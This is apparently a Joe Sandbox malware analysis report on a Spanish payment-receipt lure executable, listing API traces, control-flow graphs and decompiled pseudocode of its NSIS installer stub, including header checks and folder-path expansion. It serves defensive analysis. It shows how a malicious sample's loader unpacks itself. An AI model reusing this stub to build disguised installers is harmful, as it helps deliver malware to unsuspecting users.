                                        0x00403bc5
                                        0x00403bce
                                        0x00403bd1
                                        0x00403bd7
                                        0x00403bd7
                                        0x00403bdd
                                        0x00403bf6
                                        0x00403c07
                                        0x00000000
                                        0x00403c0c
                                        0x00403b74
                                        0x00403b76
                                        0x00000000
                                        0x00403aeb
                                        0x00403aeb
                                        0x00403af7
                                        0x00403b01
                                        0x00403b07
                                        0x00403b0c
                                        0x00403b1b
                                        0x00403c39
                                        0x00403c39
                                        0x00000000
                                        0x00403c39
                                        0x00403b2a
                                        0x00403b65
                                        0x00000000
                                        0x00403b65
                                        0x00403a22
                                        0x00403a22
                                        0x00403a25
                                        0x00403a27
                                        0x00000000
                                        0x00000000
                                        0x00403a35
                                        0x00403a47
                                        0x00403a4c
                                        0x00403a55
                                        0x00000000
                                        0x00000000
                                        0x00403a5b
                                        0x00403a5d
                                        0x00403a6a
                                        0x00403a6a
                                        0x00403a73
                                        0x00403a79
                                        0x00403aa1
                                        0x00403aa9
                                        0x00000000
                                        0x00403a8b
                                        0x00403a8c
                                        0x00403a95
                                        0x00403a9b
                                        0x00403a9c
                                        0x00000000
                                        0x00403a9c
                                        0x00403a97
                                        0x00403a99
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403a99
                                        0x00403a79

                                        APIs
                                          • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                          • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                        • lstrcatW.KERNEL32(1033,007A1F20), ref: 004039EE
                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
                                        • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated), ref: 00403AD5
                                          • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                        • RegisterClassW.USER32(007A79C0), ref: 00403B12
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B95
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
                                        • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
                                        • RegisterClassW.USER32(007A79C0), ref: 00403BD7
                                        • DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 1975747703-2831949877
                                        • Opcode ID: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
                                        • Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
                                        • Opcode Fuzzy Hash: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
                                        • Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d51 372 402f11-402f16 369->372 373 402f1b-402f49 call 40625f call 405b7c call 40625f GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 389 403046-403049 381->389 390 403099-40309e 381->390 384 402f54-402f6b 382->384 385 402f6d 384->385 386 402f6f-402f78 call 4032f2 384->386 385->386 395 4030a0-4030a8 call 402e5d 386->395 396 402f7e-402f85 386->396 392 40304b-403063 call 403308 call 4032f2 389->392 393 40306d-403097 GlobalAlloc call 403308 call 4030fa 389->393 390->374 392->390 415 403065-40306b 392->415 393->390 420 4030aa-4030bb 393->420 395->390 399 403001-403005 396->399 400 402f87-402f9b call 405d0c 396->400 404 403007-40300e call 402e5d 399->404 405 40300f-403015 399->405 400->405 418 402f9d-402fa4 400->418 404->405 411 403024-40302e 405->411 412 403017-403021 call 40672c 405->412 411->384 419 403034 411->419 412->411 415->390 415->393 418->405 422 402fa6-402fad 418->422 419->381 423 4030c3-4030c8 420->423 424 4030bd 420->424 422->405 426 402faf-402fb6 422->426 425 4030c9-4030cf 423->425 424->423 425->425 427 4030d1-4030ec SetFilePointer call 405d0c 425->427 426->405 428 402fb8-402fbf 426->428 431 4030f1 427->431 428->405 430 402fc1-402fe1 428->430 430->390 432 402fe7-402feb 430->432 431->374 433 402ff3-402ffb 432->433 434 402fed-402ff1 432->434 433->405 435 402ffd-402fff 433->435 434->419 434->433 435->405
                                        C-Code - Quality: 80%
                                        			E00402EC1(void* __eflags, signed int _a4) {
                                        				DWORD* _v8;
                                        				DWORD* _v12;
                                        				void* _v16;
                                        				intOrPtr _v20;
                                        				long _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				signed int _v44;
                                        				long _t43;
                                        				signed int _t50;
                                        				void* _t53;
                                        				void* _t57;
                                        				intOrPtr* _t59;
                                        				long _t60;
                                        				signed int _t65;
                                        				signed int _t70;
                                        				signed int _t71;
                                        				signed int _t77;
                                        				intOrPtr _t80;
                                        				long _t82;
                                        				signed int _t85;
                                        				signed int _t87;
                                        				void* _t89;
                                        				signed int _t90;
                                        				signed int _t93;
                                        				void* _t94;
                                        
                                        				_t82 = 0;
                                        				_v12 = 0;
                                        				_v8 = 0;
                                        				_t43 = GetTickCount();
                                        				_t91 = L"C:\\Users\\Arthur\\Desktop\\rJUSTIFICANTEDEPAGO.exe";
                                        				 *0x7a8a30 = _t43 + 0x3e8;
                                        				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\rJUSTIFICANTEDEPAGO.exe", 0x400);
                                        				_t89 = E00405D51(_t91, 0x80000000, 3);
                                        				_v16 = _t89;
                                        				 *0x40a018 = _t89;
                                        				if(_t89 == 0xffffffff) {
                                        					return L"Error launching installer";
                                        				}
                                        				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                        				E0040625F(L"C:\\Users\\Arthur\\Desktop", _t91);
                                        				E0040625F(0x7b7000, E00405B7C(_t92));
                                        				_t50 = GetFileSize(_t89, 0);
                                        				__eflags = _t50;
                                        				 *0x7976dc = _t50;
                                        				_t93 = _t50;
                                        				if(_t50 <= 0) {
                                        					L24:
                                        					E00402E5D("true");
                                        					__eflags =  *0x7a8a38 - _t82;
                                        					if( *0x7a8a38 == _t82) {
                                        						goto L29;
                                        					}
                                        					__eflags = _v8 - _t82;
                                        					if(_v8 == _t82) {
                                        						L28:
                                        						_t53 = GlobalAlloc(0x40, _v24); // executed
                                        						_t94 = _t53;
                                        						E00403308( *0x7a8a38 + 0x1c);
                                        						_push(_v24);
                                        						_push(_t94);
                                        						_push(_t82);
                                        						_push(0xffffffff); // executed
                                        						_t57 = E004030FA(); // executed
                                        						__eflags = _t57 - _v24;
                                        						if(_t57 == _v24) {
                                        							__eflags = _v44 & 0x00000001;
                                        							 *0x7a8a34 = _t94;
                                        							 *0x7a8a3c =  *_t94;
                                        							if((_v44 & 0x00000001) != 0) {
                                        								 *0x7a8a40 =  *0x7a8a40 + 1;
                                        								__eflags =  *0x7a8a40;
                                        							}
                                        							_t40 = _t94 + 0x44; // 0x44
                                        							_t59 = _t40;
                                        							_t85 = 8;
                                        							do {
                                        								_t59 = _t59 - 8;
                                        								 *_t59 =  *_t59 + _t94;
                                        								_t85 = _t85 - 1;
                                        								__eflags = _t85;
                                        							} while (_t85 != 0);
                                        							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
                                        							 *(_t94 + 0x3c) = _t60;
                                        							E00405D0C(0x7a8a60, _t94 + 4, 0x40);
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						goto L29;
                                        					}
                                        					E00403308( *0x78b6d4);
                                        					_t65 = E004032F2( &_a4, 4);
                                        					__eflags = _t65;
                                        					if(_t65 == 0) {
                                        						goto L29;
                                        					}
                                        					__eflags = _v12 - _a4;
                                        					if(_v12 != _a4) {
                                        						goto L29;
                                        					}
                                        					goto L28;
                                        				} else {
                                        					do {
                                        						_t90 = _t93;
                                        						asm("sbb eax, eax");
                                        						_t70 = ( ~( *0x7a8a38) & 0x00007e00) + 0x200;
                                        						__eflags = _t93 - _t70;
                                        						if(_t93 >= _t70) {
                                        							_t90 = _t70;
                                        						}
                                        						_t71 = E004032F2(0x7976e0, _t90);
                                        						__eflags = _t71;
                                        						if(_t71 == 0) {
                                        							E00402E5D("true");
                                        							L29:
                                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                        						}
                                        						__eflags =  *0x7a8a38;
                                        						if( *0x7a8a38 != 0) {
                                        							__eflags = _a4 & 0x00000002;
                                        							if((_a4 & 0x00000002) == 0) {
                                        								E00402E5D(0);
                                        							}
                                        							goto L20;
                                        						}
                                        						E00405D0C( &_v44, 0x7976e0, 0x1c);
                                        						_t77 = _v44;
                                        						__eflags = _t77 & 0xfffffff0;
                                        						if((_t77 & 0xfffffff0) != 0) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v40 - 0xdeadbeef;
                                        						if(_v40 != 0xdeadbeef) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v28 - 0x74736e49;
                                        						if(_v28 != 0x74736e49) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v32 - 0x74666f73;
                                        						if(_v32 != 0x74666f73) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v36 - 0x6c6c754e;
                                        						if(_v36 != 0x6c6c754e) {
                                        							goto L20;
                                        						}
                                        						_a4 = _a4 | _t77;
                                        						_t87 =  *0x78b6d4; // 0x67a80
                                        						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
                                        						_t80 = _v20;
                                        						__eflags = _t80 - _t93;
                                        						 *0x7a8a38 = _t87;
                                        						if(_t80 > _t93) {
                                        							goto L29;
                                        						}
                                        						__eflags = _a4 & 0x00000008;
                                        						if((_a4 & 0x00000008) != 0) {
                                        							L16:
                                        							_v8 = _v8 + 1;
                                        							_t24 = _t80 - 4; // 0x40a2dc
                                        							_t93 = _t24;
                                        							__eflags = _t90 - _t93;
                                        							if(_t90 > _t93) {
                                        								_t90 = _t93;
                                        							}
                                        							goto L20;
                                        						}
                                        						__eflags = _a4 & 0x00000004;
                                        						if((_a4 & 0x00000004) != 0) {
                                        							break;
                                        						}
                                        						goto L16;
                                        						L20:
                                        						__eflags = _t93 -  *0x7976dc; // 0x69cc8
                                        						if(__eflags < 0) {
                                        							_v12 = E0040672C(_v12, 0x7976e0, _t90);
                                        						}
                                        						 *0x78b6d4 =  *0x78b6d4 + _t90;
                                        						_t93 = _t93 - _t90;
                                        						__eflags = _t93;
                                        					} while (_t93 > 0);
                                        					_t82 = 0;
                                        					__eflags = 0;
                                        					goto L24;
                                        				}
                                        			}































                                        0x00402ec9
                                        0x00402ecc
                                        0x00402ecf
                                        0x00402ed2
                                        0x00402ed8
                                        0x00402ee9
                                        0x00402eee
                                        0x00402f01
                                        0x00402f06
                                        0x00402f09
                                        0x00402f0f
                                        0x00000000
                                        0x00402f11
                                        0x00402f1c
                                        0x00402f22
                                        0x00402f33
                                        0x00402f3a
                                        0x00402f40
                                        0x00402f42
                                        0x00402f47
                                        0x00402f49
                                        0x00403036
                                        0x00403038
                                        0x0040303d
                                        0x00403044
                                        0x00000000
                                        0x00000000
                                        0x00403046
                                        0x00403049
                                        0x0040306d
                                        0x00403072
                                        0x00403078
                                        0x00403083
                                        0x00403088
                                        0x0040308b
                                        0x0040308c
                                        0x0040308d
                                        0x0040308f
                                        0x00403094
                                        0x00403097
                                        0x004030aa
                                        0x004030ae
                                        0x004030b6
                                        0x004030bb
                                        0x004030bd
                                        0x004030bd
                                        0x004030bd
                                        0x004030c5
                                        0x004030c5
                                        0x004030c8
                                        0x004030c9
                                        0x004030c9
                                        0x004030cc
                                        0x004030ce
                                        0x004030ce
                                        0x004030ce
                                        0x004030d8
                                        0x004030de
                                        0x004030ec
                                        0x004030f1
                                        0x00000000
                                        0x004030f1
                                        0x00000000
                                        0x00403097
                                        0x00403051
                                        0x0040305c
                                        0x00403061
                                        0x00403063
                                        0x00000000
                                        0x00000000
                                        0x00403068
                                        0x0040306b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402f4f
                                        0x00402f54
                                        0x00402f59
                                        0x00402f5d
                                        0x00402f64
                                        0x00402f69
                                        0x00402f6b
                                        0x00402f6d
                                        0x00402f6d
                                        0x00402f71
                                        0x00402f76
                                        0x00402f78
                                        0x004030a2
                                        0x00403099
                                        0x00000000
                                        0x00403099
                                        0x00402f7e
                                        0x00402f85
                                        0x00403001
                                        0x00403005
                                        0x00403009
                                        0x0040300e
                                        0x00000000
                                        0x00403005
                                        0x00402f8e
                                        0x00402f93
                                        0x00402f96
                                        0x00402f9b
                                        0x00000000
                                        0x00000000
                                        0x00402f9d
                                        0x00402fa4
                                        0x00000000
                                        0x00000000
                                        0x00402fa6
                                        0x00402fad
                                        0x00000000
                                        0x00000000
                                        0x00402faf
                                        0x00402fb6
                                        0x00000000
                                        0x00000000
                                        0x00402fb8
                                        0x00402fbf
                                        0x00000000
                                        0x00000000
                                        0x00402fc1
                                        0x00402fc7
                                        0x00402fd0
                                        0x00402fd6
                                        0x00402fd9
                                        0x00402fdb
                                        0x00402fe1
                                        0x00000000
                                        0x00000000
                                        0x00402fe7
                                        0x00402feb
                                        0x00402ff3
                                        0x00402ff3
                                        0x00402ff6
                                        0x00402ff6
                                        0x00402ff9
                                        0x00402ffb
                                        0x00402ffd
                                        0x00402ffd
                                        0x00000000
                                        0x00402ffb
                                        0x00402fed
                                        0x00402ff1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040300f
                                        0x0040300f
                                        0x00403015
                                        0x00403021
                                        0x00403021
                                        0x00403024
                                        0x0040302a
                                        0x0040302c
                                        0x0040302c
                                        0x00403034
                                        0x00403034
                                        0x00000000
                                        0x00403034

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402ED2
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                          • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                          • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                        • API String ID: 4283519449-4118229437
                                        • Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                        • Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
                                        • Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                        • Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 500 406281-40628c 501 40628e-40629d 500->501 502 40629f-4062b5 500->502 501->502 503 4062bb-4062c8 502->503 504 4064cd-4064d3 502->504 503->504 505 4062ce-4062d5 503->505 506 4064d9-4064e4 504->506 507 4062da-4062e7 504->507 505->504 509 4064e6-4064ea call 40625f 506->509 510 4064ef-4064f0 506->510 507->506 508 4062ed-4062f9 507->508 511 4064ba 508->511 512 4062ff-40633d 508->512 509->510 516 4064c8-4064cb 511->516 517 4064bc-4064c6 511->517 514 406343-40634e 512->514 515 40645d-406461 512->515 518 406350-406355 514->518 519 406367 514->519 520 406463-406469 515->520 521 406494-406498 515->521 516->504 517->504 518->519 524 406357-40635a 518->524 527 40636e-406375 519->527 525 406479-406485 call 40625f 520->525 526 40646b-406477 call 4061a6 520->526 522 4064a7-4064b8 lstrlenW 521->522 523 40649a-4064a2 call 406281 521->523 522->504 523->522 524->519 532 40635c-40635f 524->532 537 40648a-406490 525->537 526->537 528 406377-406379 527->528 529 40637a-40637c 527->529 528->529 535 4063b7-4063ba 529->535 536 40637e-40639c call 40612d 529->536 532->519 538 406361-406365 532->538 541 4063ca-4063cd 535->541 542 4063bc-4063c8 GetSystemDirectoryW 535->542 543 4063a1-4063a5 536->543 537->522 540 406492 537->540 538->527 544 406455-40645b call 4064f3 540->544 546 406438-40643a 541->546 547 4063cf-4063dd GetWindowsDirectoryW 541->547 545 40643c-406440 542->545 548 406445-406448 543->548 549 4063ab-4063b2 call 406281 543->549 544->522 545->544 551 406442 545->551 546->545 550 4063df-4063e9 546->550 547->546 548->544 554 40644a-406450 lstrcatW 548->554 549->545 556 406403-406419 SHGetSpecialFolderLocation 550->556 557 4063eb-4063ee 550->557 551->548 554->544 558 406434 556->558 559 40641b-406432 SHGetPathFromIDListW CoTaskMemFree 556->559 557->556 561 4063f0-4063f7 557->561 558->546 559->545 559->558 562 4063ff-406401 561->562 562->545 562->556
                                        C-Code - Quality: 72%
                                        			E00406281(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                        				signed int _v8;
                                        				struct _ITEMIDLIST* _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				signed int _v28;
                                        				signed int _t43;
                                        				WCHAR* _t44;
                                        				signed char _t46;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				short _t58;
                                        				short _t60;
                                        				short _t62;
                                        				void* _t70;
                                        				signed int _t76;
                                        				void* _t82;
                                        				signed char _t83;
                                        				short _t86;
                                        				intOrPtr _t94;
                                        				signed int _t96;
                                        				void* _t102;
                                        				short _t103;
                                        				signed int _t106;
                                        				signed int _t108;
                                        				void* _t109;
                                        				WCHAR* _t110;
                                        				void* _t112;
                                        
                                        				_t109 = __esi;
                                        				_t102 = __edi;
                                        				_t70 = __ebx;
                                        				_t43 = _a8;
                                        				if(_t43 < 0) {
                                        					_t94 =  *0x7a79fc; // 0x880d16
                                        					_t43 =  *(_t94 - 4 + _t43 * 4);
                                        				}
                                        				_push(_t70);
                                        				_push(_t109);
                                        				_push(_t102);
                                        				_t96 =  *0x7a8a78 + _t43 * 2;
                                        				_t44 = 0x7a69c0;
                                        				_t110 = 0x7a69c0;
                                        				if(_a4 >= 0x7a69c0 && _a4 - 0x7a69c0 >> 1 < 0x800) {
                                        					_t110 = _a4;
                                        					_a4 = _a4 & 0x00000000;
                                        				}
                                        				while(1) {
                                        					_t103 =  *_t96;
                                        					if(_t103 == 0) {
                                        						break;
                                        					}
                                        					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                        					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                        						break;
                                        					}
                                        					_t82 = 2;
                                        					_t96 = _t96 + _t82;
                                        					__eflags = _t103 - 4;
                                        					_a8 = _t96;
                                        					if(__eflags >= 0) {
                                        						if(__eflags != 0) {
                                        							 *_t110 = _t103;
                                        							_t110 = _t110 + _t82;
                                        							__eflags = _t110;
                                        						} else {
                                        							 *_t110 =  *_t96;
                                        							_t110 = _t110 + _t82;
                                        							_t96 = _t96 + _t82;
                                        						}
                                        						continue;
                                        					}
                                        					_t83 =  *((intOrPtr*)(_t96 + 1));
                                        					_t46 =  *_t96;
                                        					_t47 = _t46 & 0x000000ff;
                                        					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                        					_a8 = _a8 + 2;
                                        					_v28 = _t47 | 0x00008000;
                                        					_v24 = _t47;
                                        					_t76 = _t83 & 0x000000ff;
                                        					_v16 = _t76;
                                        					__eflags = _t103 - 2;
                                        					_v20 = _t76 | 0x00008000;
                                        					if(_t103 != 2) {
                                        						__eflags = _t103 - 3;
                                        						if(_t103 != 3) {
                                        							__eflags = _t103 - 1;
                                        							if(_t103 == 1) {
                                        								__eflags = (_t47 | 0xffffffff) - _v8;
                                        								E00406281(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                        							}
                                        							L43:
                                        							_t48 = lstrlenW(_t110);
                                        							_t96 = _a8;
                                        							_t110 =  &(_t110[_t48]);
                                        							_t44 = 0x7a69c0;
                                        							continue;
                                        						}
                                        						_t106 = _v8;
                                        						__eflags = _t106 - 0x1d;
                                        						if(_t106 != 0x1d) {
                                        							__eflags = (_t106 << 0xb) + 0x7a9000;
                                        							E0040625F(_t110, (_t106 << 0xb) + 0x7a9000);
                                        						} else {
                                        							E004061A6(_t110,  *0x7a8a28);
                                        						}
                                        						__eflags = _t106 + 0xffffffeb - 7;
                                        						if(_t106 + 0xffffffeb < 7) {
                                        							L34:
                                        							E004064F3(_t110);
                                        						}
                                        						goto L43;
                                        					}
                                        					_t86 =  *0x7a8a2c;
                                        					__eflags = _t86;
                                        					_t108 = 2;
                                        					if(_t86 >= 0) {
                                        						L13:
                                        						_v8 = 1;
                                        						L14:
                                        						__eflags =  *0x7a8ac4;
                                        						if( *0x7a8ac4 != 0) {
                                        							_t108 = 4;
                                        						}
                                        						__eflags = _t47;
                                        						if(__eflags >= 0) {
                                        							__eflags = _t47 - 0x25;
                                        							if(_t47 != 0x25) {
                                        								__eflags = _t47 - 0x24;
                                        								if(_t47 == 0x24) {
                                        									GetWindowsDirectoryW(_t110, 0x400);
                                        									_t108 = 0;
                                        								}
                                        								while(1) {
                                        									__eflags = _t108;
                                        									if(_t108 == 0) {
                                        										goto L30;
                                        									}
                                        									_t58 =  *0x7a8a24;
                                        									_t108 = _t108 - 1;
                                        									__eflags = _t58;
                                        									if(_t58 == 0) {
                                        										L26:
                                        										_t60 = SHGetSpecialFolderLocation( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                        										__eflags = _t60;
                                        										if(_t60 != 0) {
                                        											L28:
                                        											 *_t110 =  *_t110 & 0x00000000;
                                        											__eflags =  *_t110;
                                        											continue;
                                        										}
                                        										__imp__SHGetPathFromIDListW(_v12, _t110);
                                        										__imp__CoTaskMemFree(_v12);
                                        										__eflags = _t60;
                                        										if(_t60 != 0) {
                                        											goto L30;
                                        										}
                                        										goto L28;
                                        									}
                                        									__eflags = _v8;
                                        									if(_v8 == 0) {
                                        										goto L26;
                                        									}
                                        									_t62 =  *_t58( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                        									__eflags = _t62;
                                        									if(_t62 == 0) {
                                        										goto L30;
                                        									}
                                        									goto L26;
                                        								}
                                        								goto L30;
                                        							}
                                        							GetSystemDirectoryW(_t110, 0x400);
                                        							goto L30;
                                        						} else {
                                        							E0040612D( *0x7a8a78, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                        							__eflags =  *_t110;
                                        							if( *_t110 != 0) {
                                        								L32:
                                        								__eflags = _t76 - 0x1a;
                                        								if(_t76 == 0x1a) {
                                        									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                        								}
                                        								goto L34;
                                        							}
                                        							E00406281(_t76, _t108, _t110, _t110, _t76);
                                        							L30:
                                        							__eflags =  *_t110;
                                        							if( *_t110 == 0) {
                                        								goto L34;
                                        							}
                                        							_t76 = _v16;
                                        							goto L32;
                                        						}
                                        					}
                                        					__eflags = _t86 - 0x5a04;
                                        					if(_t86 == 0x5a04) {
                                        						goto L13;
                                        					}
